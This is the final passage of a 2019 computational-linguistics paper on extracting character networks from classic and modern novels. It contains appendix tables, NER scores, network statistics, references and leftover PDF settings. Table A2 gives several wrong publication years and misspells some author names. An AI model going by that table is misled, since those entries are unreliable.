between the classic and modern novels. Again, we found that the distribution of network measures within a class was subject to high variance, which holds for our collection of both classic and modern novels. We therefore recommend that future work focuses on determining particular characteristics that can influence these analyses first and then perform a comparative analysis between subsets to see if this similarity between classes holds when the variance is reduced. Future studies could therefore attempt to compare classic and modern novels in the same genre or narration type (e.g. first-person vs third-person perspective). Lastly, different types of networks that for example collapse characters that occur under different names (cf. Dany and Daenerys) as well as dealing with plural pronouns and group membership (e.g. characters sometimes mentioned Dekker et al. (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.189 20/29 http://dx.doi.org/10.7717/peerj-cs.189 https://peerj.com/computer-science/ individually and sometimes as part of a group) are currently unsolved problems for language technology and knowledge representation. These issues point to a strong need for more culturally-aware artificial intelligence. APPENDIX: ADDITIONAL STATISTICS Table A1 Characters that were not identified by the system, supplied by the annotators. Classic Modern Ada Howard Mrs. Billington Archmage of Ymitury† Manie Algy Joanna Mrs. Birch† August† Meena Alice Johnny Mrs. Crisp† Bil Baker† Mercy† Anna Boleyne Jolly Miller† Mrs. Effington Stubbs Blue† Mrs. Potter† Aprahamian Leonard Mrs. Thingummy Brine Cutter† Old Cob† Belisarius Lord Mayor† Murray Bug† One-Eye† Best-Ingram Lory† Nathan Swain† Chyurda Pappa Doc† Cain Major Dover† Peter Teazle† Cotillion† Patience† Caroline Marie Antoinette Policar Morrel† Croaker† Plowman† Catherine Marshal Bertrand† President West† Curly† Poul Cato Matilda Carbury Queequeg Dadda Rand† Cervantes Matron† Rip Van Winkle† Dancing† Shalash Christine Miss Birch† Royce Domi Shrewd† Chuck Loyola† Miss Crump† Sawbones† Dow† Silent† Cleopatra Miss Hopkins† Semiramis Elam Dowtry Sirius† Connolly Norman† Miss King† Shep Elao Talenel Curly† Miss Saltire† Sir Carbury Fredor Talenelat Dante Miss Swindle† Skrimshander† Gart Ted Dave Mme. D’Artagnan Stamford Harold The Empress† Dives† Mollie Stigand Harvey Themos Tresting Dodo† Mouse† Sudeley Howard Theron Dr. Floss† Mr. Stroll† Swubble Ien Threetrees Duck† Mr. Thursgood The Director† Ilgrand Lender† Toffston Edgar Atheling† Mr. Beaufort† Tommy Barnes Ishar Verus Elmo Mr. Crisp† Unwin Ishi Walleye† Farmer Mitchell† Mr. Flowerdew Ursula Jim McGuffin† Weasel† Father Joseph† Mr. Lawrence Victor† Kerible the Enchanter† Willum Fury† Mr. Morris Vilkins Lilly† Wit Congar† Ginny Mrs Loveday Von Bischoff Henry VIII Mrs. Bates† Ysabel 39 out of 90 characters: 43% 30 out of 56 characters: 54% Note: Characters whose names (partly) consist of a real word—such as ‘Curly’ or ‘Mercy’—are marked with a †. Checked against http://dictionary.com. Dekker et al. (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.189 21/29 http://dictionary.com http://dx.doi.org/10.7717/peerj-cs.189 https://peerj.com/computer-science/ Table A2 Classic and modern novels included in this study. Classic Title Author (Year) E-book No./ISBN 1984 George Orwell (1949) 9780451518651 A Study in Scarlet Conan Doyle (1886) 244 Alice in Wonderland Lewis Carroll (1884) 19033 Brave New World Aldous Huxley (1865) 9780965185196 David Copperfield Charles Dickins (1931) 766 Dracula Bram Stoker (1850) 345 Emma Jane Austen (1897) 158 Frankenstein Mary Shelley (1815) 84 Huckleberry Finn Mark Twain (1818) 76 Jekyll and Hyde Robert Stevenson (1851) 42 Moby Dick Herman Melville (1838) 2701 Oliver Twist Charles Dickins (1813) 730 Pride and Prejudice Jane Austen (1886) 1342 The Call of the Wild Jack London (1903) 215 The Count of Monte Cristo Alexandre Dumas (1844) 1184 The Fellowship of the Ring J. R. R. Tolkien (1954) 9780547952017 The Three Musketeers Alexandre Dumas (1844) 1257 The Way We Live Now Anthony Trollope (1875) 5231 Ulysses James Joyce (1922) 4300 Vanity Fair William Thackeray (1847) 599 Modern A Game of Thrones G.R.R. Martin (1996) 9780307292094 Assassin’s Apprentice Robin Hobb (1995) 9781400114344 Elantris Brandon Sanderson (2005) 9780765383105 Gardens of the Moon Steven Erikson (1999) 9788498003178 Harry Potter J.K. Rowling (1998) 9781781103685 Magician Raymond Feist (1982) 9780007466863 Mistborn Brandon Sanderson (2006) 9788374805537 Prince of Thorns Mark Lawrence (2011) 9786067192681 Storm Front Jim Butcher (2000) 9781101128657 The Black Company Glen Cook (1984) 9782841720743 The Black Prism Brent Weeks (2010) 9782352945260 The Blade Itself Joe Abercrombie (2006) 9781478935797 The Colour of Magic Terry Pratchett (1983) 9788374690973 The Gunslinger Steven King (1982) 9781501143519 The Lies of Locke Lamora Scott Lynch (2006) 9780575079755 The Name of the Wind Patrick Rothfuss (2007) 9782352949152 The Painted Man Peter Brett (2008) 9780007518616 The Way of Kings Brandon Sanderson (2010) 9780765326355 The Wheel of Time Robert Jordan (1990) 9781857230765 Way of Shadows Brent Weeks (2008) 9781607513513 Note: The short E-book numbers are the catalog entry of novels obtained from Gutenberg. Novels obtained through online purchase are denoted by the longer ISBNs. Dekker et al. (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.189 22/29 http://dx.doi.org/10.7717/peerj-cs.189 https://peerj.com/computer-science/ Table A3 Overall statistics for classic and modern novels in our corpus. Classic Title Fraction of defaults Fraction of unidentified characters Average sentence length Average persons per sentence Fraction of sentences with a person Annotated sentences Unique characters Total character mentions 1984 0.55 0.00† 18.01 1.17 0.32 316 29 2,162 A Study in Scarlet 0.83 0.50 18.99 1.17 0.18 193 34 837 Alice in Wonderland 0.26 0.56⋄ 20.99 1.23 0.79 316 17 656 Brave New World 0.35 0.17 15.87 1.06 0.25 299 51 1,809 David Copperfield 0.61 0.00† 22.79 1.08 0.49 261 157 9,922 Dracula 0.93⋄ 0.00† 21.96 1.00† 0.06† 233 72 3,369 Emma 0.43 0.10 22.38 1.38 0.81 224 78 6,946 Frankenstein 0.86 0.22 25.80 1.19 0.17 300 29 658 Huckleberry Finn 0.59 0.14 23.46 1.20 0.40 215 82 1,749 Jekyll and Hyde 0.67 0.29 26.19 1.17 0.34 120† 13† 523† Moby Dick 0.88 0.38 25.24 1.10 0.10 442 135 2,454 Oliver Twist 0.36 0.33 21.64 1.23 0.68 303 69 4,495 Pride and Prejudice 0.46 0.10 24.13 1.48 0.79 257 62 5,104 The Call of the Wild 0.49 0.50 21.67 1.31 0.61 192 28 731 The Count of Monte Cristo 0.47 0.25 21.91 1.35 0.79 197 250 13,562 The Lord of the Rings 0.47 0.48 16.30 1.20 0.46 769⋄ 134 5,268 The Three Musketeers 0.60 0.36 19.19 1.13 0.49 265 115 4,842 The Way We Live Now 0.57 0.46 18.93 1.14 0.47 341 147 13,993⋄ Ulysses 0.57 0.33 13.35† 1.15 0.41 303 651⋄ 8,510 Vanity Fair 0.24† 0.44 27.27⋄ 1.54⋄ 1.05⋄ 256 359 11,503 Mean m 0.56 0.28 21.30 1.21 0.48 290.10 125.60 4,954.65 Standard Deviation s 0.20 0.18 3.67 0.14 0.27 131.89 150.20 4,403.32 Modern A Game of Thrones 0.29 0.00† 14.53 1.30 0.82⋄ 283 322⋄ 15,839⋄ Assassin’s Apprentice 0.71 0.29 14.94 1.18 0.38 460 66 2,857 Elantris 0.32 0.27 14.24 1.10 0.60 367 14† 226† Gardens of the Moon 0.75 0.44 12.20 1.03† 0.25 304 111 4,479 Harry Potter 0.32 0.33 15.55 1.33 0.74 338 84 5,114 Magician 0.49 0.17 14.78 1.16 0.45 310 115 4,976 Mistborn 0.34 0.22 12.90 1.19 0.68 297 104 11,672 Prince of Thorns 0.54 0.00† 12.33 1.14 0.38 107 79 2,282 Storm Front 0.77 0.00† 14.02 1.05 0.18 211 43 2,368 The Black Company 0.56 0.64⋄ 9.73† 1.07 0.26 305 42 1,908 The Black Prism 0.50 0.14 13.19 1.04 0.40 380 88 10,890 The Blade Itself 0.66 0.29 12.55 1.14 0.24 103 107 6,769 The Colour of Magic 0.55 0.50 14.21 1.12 0.42 139 34 1,454 The Gunslinger 0.78⋄ 0.25 13.43 1.11 0.17† 230 35 1,159 The Lies of Locke Lamora 0.21† 0.09 16.90⋄ 1.38⋄ 0.77 305 105 6,477 (Continued) Dekker et al. (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.189 23/29 http://dx.doi.org/10.7717/peerj-cs.189 https://peerj.com/computer-science/ Table A3 (continued). Classic Title Fraction of defaults Fraction of unidentified characters Average sentence length Average persons per sentence Fraction of sentences with a person Annotated sentences Unique characters Total character mentions The Name of the Wind 0.45 0.10 12.98 1.14 0.45 310 137 6,405 The Painted Man 0.30 0.28 14.67 1.29 0.70 301 137 9,048 The Way of Kings 0.31 0.29 12.20 1.10 0.36 316 221 14,696 The Wheel of Time 0.40 0.21 14.96 1.31 0.59 499⋄ 188 9,426 Way of Shadows 0.32 0.13 13.53 1.32 0.56 88† 160 8,721 Mean m 0.48 0.23 13.69 1.17 0.47 282.65 109.60 6,338.30 Standard Deviation s 0.18 0.17 1.54 0.11 0.20 110.52 72.98 4,535.60 mclassic - mmodern 0.08 0.05 7.61 0.04 0.01 7.45 16.00 -1,383.65 Pooled s 0.20 0.17 2.46 0.24 0.25 125 119 4,473 p-Value 0.21 0.39 >0.01 0.73 0.74 0.85 0.68 0.35 Significant No No Yes No No No No No Note: The highest scores in each column are highlighted with a ⋄, and the lowest scores with a †. The highest and lowest performing books for each class, in terms of F1-score found in Tables A3 and A4, are marked with a grey fill. Boldface indicate the highest and lowest scores in each column. Table A4 Results of the complete BookNLP pipeline: Named entity recognition (Stanford NER), Character name clustering (e.g. ‘Tom’, ‘Tom Sawyer’, ‘Mr. Sawyer’, ‘Thomas Sawyer’ / TOM_SAWYER) and Pronominal coreference resolution. Classic Modern Title Precision Recall F1-score Title Precision Recall F1-score 1984 77.33 72.87 75.03 A Game of Thrones 51.40 45.88 48.49 A Study in Scarlet⊙ 40.00 37.22 38.56 Assassin’s Apprentice⊙ 37.00 34.89 35.91 Alice in Wonderland 54.93 48.36 51.43 Elantris 72.33 73.75 73.03 Brave New World 55.00 53.57 54.28 Gardens of the Moon 12.67 14.00 13.30 David Copperfield⊙ 38.52 37.82 38.16 Harry Potter 79.17⋄ 77.78⋄ 78.47⋄ Dracula⊙ 36.67 40.00 38.26 Magician 35.42 28.89 31.82 Emma 86.62⋄ 86.50⋄ 86.56⋄ Mistborn 61.99 60.62 61.30 Frankenstein⊙ 51.16 45.35 48.08 Prince of Thorns 69.44 70.83 70.13 Huckleberry Finn 82.38 82.82 82.60 Storm Front⊙ 40.54 39.19 39.85 Jekyll and Hyde 52.86 50.00 51.39 The Black Company⊙ 6.85† 5.71† 6.23† Moby Dick⊙ 60.98 57.72 59.31 The Black Prism 76.90 77.59 77.24 Oliver Twist 77.64 74.35 75.96 The Blade Itself 34.09 36.36 35.19 Pride and Prejudice 73.55 72.22 72.88 The Colour of Magic 30.77 27.56 29.08 The Call of the Wild 30.00 25.19 27.38 The Gunslinger 77.84 75.89 76.85 The Count of Monte Cristo 40.72 35.80 38.10 The Lies of Locke Lamora 62.77 59.16 60.91 The Fellowship of the Ring 63.23 60.61 61.90 The Name of the Wind 61.38 58.67 60.00 The Three Musketeers 13.91† 12.17† 12.99† The Painted Man 60.16 57.83 58.97 The Way We Live Now 66.07 66.79 66.43 The Way of Kings 65.87 64.42 65.14 Ulysses 66.67 66.98 66.82 The Wheel of Time 29.60 24.33 26.70 Vanity Fair 72.57 68.63 70.54 Way of Shadows 54.05 45.95 49.67 Dekker et al. (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.189 24/29 http://dx.doi.org/10.7717/peerj-cs.189 https://peerj.com/computer-science/ Table A4 (continued). Classic Modern Title Precision Recall F1-score Title Precision Recall F1-score Mean m 57.04 54.75 55.83 Mean m 51.01 48.96 49.91 Standard Deviation s 19.28 19.68 19.47 Standard Deviation s 21.49 21.95 21.72 Note: The highest scores in each column are highlighted with a ⋄, and the lowest scores with a †. Novels written in 1st person are marked with a ⊙. Boldface indicate the highest and lowest scores in each column. Table A5 Social network measures for classic and modern novels. Classic Title Nodes Edges Average degree Average weighted degree Network diameter Graph density Modularity Connected components Average clustering coefficient Average path length 1984 26 43 3.30 16.84 4 0.13 0.23 3 0.5 2.06 A Study in Scarlet 24 41 3.41 7.25 5 0.14 0.42 2 0.63 2.37 Alice in Wonderland 12 10† 1.66† 3.83† 3 0.15 0.15 2 0† 1.93 Brave New World 39 65 3.33 9.79 6 0.09 0.34 2 0.68 2.53 David Copperfield 142 499 7.03 23.11 6 0.05 0.49 2 0.57 2.69 Dracula 55 124 4.51 18.29 6 0.08 0.12† 4 0.52 2.53 Emma 72 403 11.19 57.53⋄ 4 0.16 0.14 1 0.67 2.16 Frankenstein 20 38 3.80 10.60 5 0.20 0.51 2 0.75 2.41 Huckleberry Finn 62 121 3.90 8.42 7 0.06 0.52⋄ 4 0.60 3.30 Jekyll and Hyde 10† 21 4.20 14.60 2† 0.47⋄ 0.12 1 0.81⋄ 1.53† Moby Dick 90 169 3.76 7.38 8 0.04 0.44 8 0.59 3.33⋄ Oliver Twist 62 191 6.16 22.32 4 0.10 0.32 2 0.75 2.26 Pride and Prejudice 62 373 12.03 57.10 4 0.20 0.16 1 0.73 1.96 The Call of the Wild 23 44 3.83 10.00 6 0.17 0.46 1 0.62 2.46 The Count of Monte Cristo 228 799 7.01 24.05 7 0.03 0.40 3 0.56 2.88 The Fellowship of the Ring 105 260 4.95 11.51 6 0.05 0.29 2 0.63 2.73 The Three Musketeers 96 279 5.81 15.33 5 0.06 0.32 1 0.55 2.56 The Way We Live Now 135 630 9.33 39.17 5 0.07 0.36 3 0.69 2.43 Ulysses 522⋄ 4,116⋄ 15.77⋄ 18.59 9⋄ 0.03 0.45 10⋄ 0.60 3.02 Vanity Fair 342 1,349 7.89 22.73 7 0.02† 0.37 1 0.63 2.72 Mean m 106 479 6.14 20 5.45 0.12 0.33 2.75 0.60 2.49 Standard Deviation s 126.94 916.66 3.56 14.99 1.70 0.10 0.14 2.39 0.17 0.44 Modern A Game of Thrones 314⋄ 1,648⋄ 10.50⋄ 22.46 6 0.03 0.48 1 0.54 2.81 Assassin’s Apprentice 55 110 4.00 9.09 6 0.07 0.34 2 0.49 2.65 Elantris 106 493 9.30 43.25⋄ 5 0.09 0.36 1 0.67 2.22† Gardens of the Moon 88 257 5.84 10.84 8 0.07 0.42 1 0.48 2.93 Harry Potter 67 198 5.9 19.37 5 0.09 0.15 1 0.68 2.23 Magician 84 209 4.98 10.76 6 0.06 0.43 2 0.58 2.83 (Continued) Dekker et al. (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.189 25/29 http://dx.doi.org/10.7717/peerj-cs.189 https://peerj.com/computer-science/ ADDITIONAL INFORMATION AND DECLARATIONS Funding The authors received no funding for this work. Competing Interests The authors declare that they have no competing interests. Author Contributions � Niels Dekker conceived and designed the experiments, performed the experiments, analysed the data, contributed reagents/materials/analysis tools, prepared figures and/or tables, performed the computation work, authored or reviewed drafts of the paper, approved the final draft. � Tobias Kuhn contributed reagents/materials/analysis tools, authored or reviewed drafts of the paper, approved the final draft. Table A5 (continued). Classic Title Nodes Edges Average degree Average weighted degree Network diameter Graph density Modularity Connected components Average clustering coefficient Average path length Mistborn 89 255 5.73 33.89 6 0.07 0.04† 3 0.62 2.37 Prince of Thorns 59 111 3.76 6.98 6 0.07 0.37 2 0.42† 2.83 Storm Front 33 85 5.15 10.97 4† 0.16⋄ 0.31 1 0.64 2.26 The Black Company 30 45 3.00† 6.13† 6 0.10 0.20 3 0.561 2.43 The Black Prism 84 239 5.69 30.74 5 0.07 0.22 1 0.75⋄ 2.27 The Blade Itself 96 259 5.40 14.23 5 0.06 0.51 3 0.51 2.65 The Colour of Magic 27† 43† 3.19 7.93 6 0.12 0.38 1 0.50 2.67 The Gunslinger 31 69 4.45 8.52 7 0.15 0.41 1 0.43 2.87 The Lies of Locke Lamora 101 261 5.17 22.24 5 0.05 0.18 4 0.64 2.46 The Name of the Wind 109 197 3.62 8.99 9⋄ 0.03 0.67⋄ 5 0.46 4.06⋄ The Painted Man 132 444 6.73 23.15 7 0.05 0.53 1 0.63 2.70 The Way of Kings 172 448 5.21 20.79 6 0.03† 0.57 9⋄ 0.55 2.91 The Wheel of Time 167 545 6.53 16.66 7 0.04 0.35 3 0.55 2.84 Way of Shadows 145 441 6.08 22.14 6 0.04 0.46 4 0.61 2.71 Mean m 99 317 5.50 17 6.05 0.07 0.36 2.45 0.56 2.68 Standard Deviation s 66.37 348.92 1.85 10.05 1.15 0.04 0.15 1.99 0.09 0.4 mclassic - mmodern 7 162 0.64 3 -0.60 0.05 -0.03 0.30 0.04 -0.19 Pooled s 101 695 2.83 12.83 1.45 0.08 0.15 2.18 0.13 0.43 p-Value 0.83 0.47 0.49 0.55 0.20 0.09 0.42 0.67 0.37 0.17 Significant No No No No No No No No No No Note: The highest scores in each column are highlighted with a ⋄, and the lowest scores with a †. The highest and lowest performinag books for each class, in terms of F1-score found in Tables 3 and 4, are marked with a grey fill. Boldface indicate the highest and lowest scores in each column. Dekker et al. (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.189 26/29 http://dx.doi.org/10.7717/peerj-cs.189 https://peerj.com/computer-science/ � Marieke van Erp conceived and designed the experiments, contributed reagents/ materials/analysis tools, authored or reviewed drafts of the paper, approved the final draft. Data Availability The following information was supplied regarding data availability: Code and data are available at GitHub: https://github.com/Niels-Dekker/Out-with-the- Old-and-in-with-the-Novel. REFERENCES Agarwal A, Corvalan A, Jensen J, Rambow O. 2012. Social network analysis of alice in wonderland. In: Proceedings of the NAACL-HLT 2012 Workshop on Computational Linguistics for Literature. Uppsala: Association for Computational Linguistics, 88–96. Agarwal A, Kotalwar A, Rambow O. 2013. Automatic extraction of social networks from literary text: a case study on alice in wonderland. In: Sixth International Joint Conference on Natural Language Processing (IJNLP 2013). Nagoya: Asian Federation for Natural Language Processing, 1202–1208. Agerri R, Rigau G. 2016. Robust multilingual named entity recognition with shallow semi- supervised features. Artificial Intelligence 238:63–82 DOI 10.1016/j.artint.2016.05.003. Akimushkin C, Amancio DR, Oliveira ON Jr. 2017. Text authorship identified using the dynamics of word co-occurrence networks. PLOS ONE 12(1)e0170527 DOI 10.1371/journal.pone.0170527. Amancio DR. 2015. Probing the topological properties of complex networks modeling short written texts. PLOS ONE 10(2)e0118394 DOI 10.1371/journal.pone.0118394. Ardanuy MC, Sporleder C. 2014. Structure-based clustering of novels. In: Proceedings of the EACL Workshop on Computational Linguistics for Literature. Gothenburg: Sweden Association for Computational Linguistics, 31–39. Bamman D, Underwood T, Smith NA. 2014. A bayesian mixed effects model of literary character. In: Proceedings of the 52nd Annual Meeting of the Association for Computational Linguistics (ACL 2014). Baltimore: Association for Computational Linguistics, 370–379. Biber D, Finegan E. 1989. Drift and the evolution of english style: a history of three genres. Language 65(3):487–517 DOI 10.2307/415220. Blondel VD, Guillaume J-L, Lambiotte R, Lefebvre E. 2008. Fast unfolding of communities in large networks. Journal of Statistical Mechanics: Theory and Experiment 2008(10):P10008 DOI 10.1088/1742-5468/2008/10/p10008. Boccaletti S, Latora V, Moreno Y, Chavez M, Hwang D-U. 2006. Complex networks: structure and dynamics. Physics Reports 424(4–5):175–308. Bringhurst R. 2004. The elements of typographic style. British Columbia: Hartley & Marks Vancouver. Chambers N, Jurafsky D. 2008. Unsupervised learning of narrative event chains. In: Proceedings of the 46th Annual Meeting of the Association for Computational Linguistics (ACL 2008), Vol. 94305. Columbus: Association for Computational Linguistics, 789–797. Danon L, Diaz-Guilera A, Duch J, Arenas A. 2005. Comparing community structure identification. Journal of Statistical Mechanics: Theory and Experiment 2005(09):P09008 DOI 10.1088/1742-5468/2005/09/p09008. Dekker et al. (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.189 27/29 https://github.com/Niels-Dekker/Out-with-the-Old-and-in-with-the-Novel https://github.com/Niels-Dekker/Out-with-the-Old-and-in-with-the-Novel http://dx.doi.org/10.1016/j.artint.2016.05.003 http://dx.doi.org/10.1371/journal.pone.0170527 http://dx.doi.org/10.1371/journal.pone.0118394 http://dx.doi.org/10.2307/415220 http://dx.doi.org/10.1088/1742-5468/2008/10/p10008 http://dx.doi.org/10.1088/1742-5468/2005/09/p09008 http://dx.doi.org/10.7717/peerj-cs.189 https://peerj.com/computer-science/ De Does J, Depuydt K, Van Dalen-Oskam K, Marx M. 2017. Namescape: named entity recognition from a literary perspective. In: Odijk J, Van Hessen A, eds. CLARIN in the Low Countries. London: Ubiquity Press, 361–370. Dijkstra EW. 1959. A note on two problems in connexion with graphs. Numerische Mathematik 1(1):269–271 DOI 10.1007/bf01386390. Elson DK, Dames N, McKeown KR. 2010. Extracting social networks from literary fiction. In: Proceedings of the 48th Annual Meeting of the Association for Computational Linguistics, Uppsala: Association for Computational Linguistics, 138–147. Elson DK, McKeown K. 2010. Automatic attribution of quoted speech in literary narrative. In: Proceedings of the 24th AAAI Conference on Artificial Intelligence (AAAI-2010). Atlanta: Association for the Advancement of Artificial Intelligence. Fernandez M, Peterson M, Ulmer B. 2015. Extracting social network from literature to predict antagonist and protagonist. Technical report. Stanford: Stanford University. Available at https://nlp.stanford.edu/courses/cs224n/2015/reports/14.pdf. Finkel JR, Grenager T, Manning C. 2005. Incorporating non-local information into information extraction systems by gibbs sampling. In: Proceedings of the 43rd Annual Meeting on Association for Computational Linguistics. Ann Arbor: Association for Computational Linguistics, 363–370. He H, Barbosa D, Kondrak G. 2013. Identification of speakers in novels. In: Proceedings of the 51st Annual Meeting of the Association for Computational Linguistics (ACL 2013), Sofia: Association for Computational Linguistics, 1312–1320. Kumar R, Novak J, Tomkins A. 2010. Structure and evolution of online social networks. In: Philip SY, Jiawei H, Christos F, eds. Link Mining: Models, Algorithms, and Applications. New York: Springer-Verlag, 337–357. Lee J, Yeung CY. 2012. Extracting networks of people and places from literary texts. In: Proceedings of the 26th Pacific Asia Conference on Language, Information, and Computation (PACLIC 2012). Bali: Faculty of Computer Science Universitas Indonesia, 209–218. Mac Carron P, Kenna R. 2012. Universal properties of mythological networks. EPL (Europhysics Letters) 99(2):28002 DOI 10.1209/0295-5075/99/28002. McCrum R. 2003. The 100 greatest novels of all time: The list. The Guardian. Available at https://www.theguardian.com/books/2003/oct/12/features.fiction (accessed 30 October 2017). Mislove A, Marcon M, Gummadi KP, Druschel P, Bhattacharjee B. 2007. Measurement and analysis of online social networks. In: In: Proceedings of the 7th ACM SIGCOMM Conference on Internet Measurement. New York: ACM, 29–42. Moretti F. 2013. Distant reading. Brooklyn: Verso Books. Newman ME. 2006. Modularity and community structure in networks. Proceedings of the National Academy of Sciences of the United States of America 103(23):8577–8582. Ratinov L, Roth D. 2009. Design challenges and misconceptions in named entity recognition. In: Proceedings of the 30th Conference on Computational Natural Language Learning (CoNLL-2009). Boulder: Association for Computational Linguistics, 147–155. Sainte-Beuve CA. 1910. What is a classic? In: Eliot CW, ed. Literary and Philosophical Essays: French, German and Italian, Volume 32 of the Harvard classics P. F. Collier & Son Corporation. Scott J. 2012. Social network analysis. London: Sage. Telesford QK, Joyce KE, Hayasaka S, Burdette JH, Laurienti PJ. 2011. The ubiquity of small-world networks. Brain Connectivity 1(5):367–375 DOI 10.1089/brain.2011.0038. Travers J, Milgram S. 1967. The small world problem. Phychology Today 1:61–67. Dekker et al. (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.189 28/29 http://dx.doi.org/10.1007/bf01386390 https://nlp.stanford.edu/courses/cs224n/2015/reports/14.pdf http://dx.doi.org/10.1209/0295-5075/99/28002 https://www.theguardian.com/books/2003/oct/12/features.fiction http://dx.doi.org/10.1089/brain.2011.0038 https://peerj.com/computer-science/ http://dx.doi.org/10.7717/peerj-cs.189 Vala H, Jurgens D, Piper A, Ruths D. 2015. Mr. bennet, his coachman, and the archbishop walk into a bar but only one of them gets recognized: on the difficulty of detecting characters in literary texts. In: Proceedings of the 2015 Conference on Empirical Methods in Natural Language Processing. Lisbon: Association for Computational Linguistics, 769–774. Van Dalen-Oskam K, De Does J, Marx M, Sijaranamual I, Depuydt K, Verheij B, Geirnaert V. 2014. Named entity recognition and resolution for literary studies. Computational Linguistics in the Netherlands Journal 4:121–136. Wasserman S, Faust K. 1994. Social network analysis: methods and applications. Vol. 8. Cambridge: Cambridge University Press. Watts DJ, Strogatz SH. 1998. Collective dynamics of ‘small-world’ networks. Nature 393(6684):440–442 DOI 10.1038/30918. Dekker et al. (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.189 29/29 http://dx.doi.org/10.1038/30918 https://peerj.com/computer-science/ http://dx.doi.org/10.7717/peerj-cs.189 Evaluating named entity recognition tools for extracting social networks from novels Introduction Related Work Materials and Data Preparation Named Entity Recognition Experiments and Results Network Analysis Discussion and Performance Boosting Options Conclusion and Future Work Appendix: Additional Statistics References << /ASCII85EncodePages false /AllowTransparency false /AutoPositionEPSFiles true /AutoRotatePages /None /Binding /Left /CalGrayProfile (Dot Gain 20%) /CalRGBProfile (sRGB IEC61966-2.1) /CalCMYKProfile (U.S. Web Coated \050SWOP\051 v2) /sRGBProfile (sRGB IEC61966-2.1) /CannotEmbedFontPolicy /Warning /CompatibilityLevel 1.4 /CompressObjects /Off /CompressPages true /ConvertImagesToIndexed true /PassThroughJPEGImages true /CreateJobTicket false /DefaultRenderingIntent /Default /DetectBlends true /DetectCurves 0.0000 /ColorConversionStrategy /LeaveColorUnchanged /DoThumbnails false /EmbedAllFonts true /EmbedOpenType false /ParseICCProfilesInComments true /EmbedJobOptions true /DSCReportingLevel 0 /EmitDSCWarnings false /EndPage -1 /ImageMemory 1048576 /LockDistillerParams false /MaxSubsetPct 100 /Optimize true /OPM 1 /ParseDSCComments true /ParseDSCCommentsForDocInfo true /PreserveCopyPage true /PreserveDICMYKValues true /PreserveEPSInfo true /PreserveFlatness true /PreserveHalftoneInfo false /PreserveOPIComments false /PreserveOverprintSettings true /StartPage 1 /SubsetFonts true /TransferFunctionInfo /Apply /UCRandBGInfo /Preserve /UsePrologue false /ColorSettingsFile (None) /AlwaysEmbed [ true ] /NeverEmbed [ true ] /AntiAliasColorImages false /CropColorImages true /ColorImageMinResolution 300 /ColorImageMinResolutionPolicy /OK /DownsampleColorImages false /ColorImageDownsampleType /Average /ColorImageResolution 300 /ColorImageDepth 8 /ColorImageMinDownsampleDepth 1 /ColorImageDownsampleThreshold 1.50000 /EncodeColorImages true /ColorImageFilter /FlateEncode /AutoFilterColorImages false /ColorImageAutoFilterStrategy /JPEG /ColorACSImageDict << /QFactor 0.15 /HSamples [1 1 1 1] /VSamples [1 1 1 1] >> /ColorImageDict << /QFactor 0.15 /HSamples [1 1 1 1] /VSamples [1 1 1 1] >> /JPEG2000ColorACSImageDict << /TileWidth 256 /TileHeight 256 /Quality 30 >> /JPEG2000ColorImageDict << /TileWidth 256 /TileHeight 256 /Quality 30 >> /AntiAliasGrayImages false /CropGrayImages true /GrayImageMinResolution 300 /GrayImageMinResolutionPolicy /OK /DownsampleGrayImages false /GrayImageDownsampleType /Average /GrayImageResolution 300 /GrayImageDepth 8 /GrayImageMinDownsampleDepth 2 /GrayImageDownsampleThreshold 1.50000 /EncodeGrayImages true /GrayImageFilter /FlateEncode /AutoFilterGrayImages false /GrayImageAutoFilterStrategy /JPEG /GrayACSImageDict << /QFactor 0.15 /HSamples [1 1 1 1] /VSamples [1 1 1 1] >> /GrayImageDict << /QFactor 0.15 /HSamples [1 1 1 1] /VSamples [1 1 1 1] >> /JPEG2000GrayACSImageDict << /TileWidth 256 /TileHeight 256 /Quality 30 >> /JPEG2000GrayImageDict << /TileWidth 256 /TileHeight 256 /Quality 30 >> /AntiAliasMonoImages false /CropMonoImages true /MonoImageMinResolution 1200 /MonoImageMinResolutionPolicy /OK /DownsampleMonoImages false /MonoImageDownsampleType /Average /MonoImageResolution 1200 /MonoImageDepth -1 /MonoImageDownsampleThreshold 1.50000 /EncodeMonoImages true /MonoImageFilter /CCITTFaxEncode /MonoImageDict << /K -1 >> /AllowPSXObjects false /CheckCompliance [ /None ] /PDFX1aCheck false /PDFX3Check false /PDFXCompliantPDFOnly false /PDFXNoTrimBoxError true /PDFXTrimBoxToMediaBoxOffset [ 0.00000 0.00000 0.00000 0.00000 ] /PDFXSetBleedBoxToMediaBox true /PDFXBleedBoxToTrimBoxOffset [ 0.00000 0.00000 0.00000 0.00000 ] /PDFXOutputIntentProfile (None) /PDFXOutputConditionIdentifier () /PDFXOutputCondition () /PDFXRegistryName () /PDFXTrapped /False /CreateJDFFile false /Description << /CHS <FEFF4f7f75288fd94e9b8bbe5b9a521b5efa7684002000500044004600206587686353ef901a8fc7684c976262535370673a548c002000700072006f006f00660065007200208fdb884c9ad88d2891cf62535370300260a853ef4ee54f7f75280020004100630072006f0062006100740020548c002000410064006f00620065002000520065006100640065007200200035002e003000204ee553ca66f49ad87248672c676562535f00521b5efa768400200050004400460020658768633002> /CHT <FEFF4f7f752890194e9b8a2d7f6e5efa7acb7684002000410064006f006200650020005000440046002065874ef653ef5728684c9762537088686a5f548c002000700072006f006f00660065007200204e0a73725f979ad854c18cea7684521753706548679c300260a853ef4ee54f7f75280020004100630072006f0062006100740020548c002000410064006f00620065002000520065006100640065007200200035002e003000204ee553ca66f49ad87248672c4f86958b555f5df25efa7acb76840020005000440046002065874ef63002> /DAN 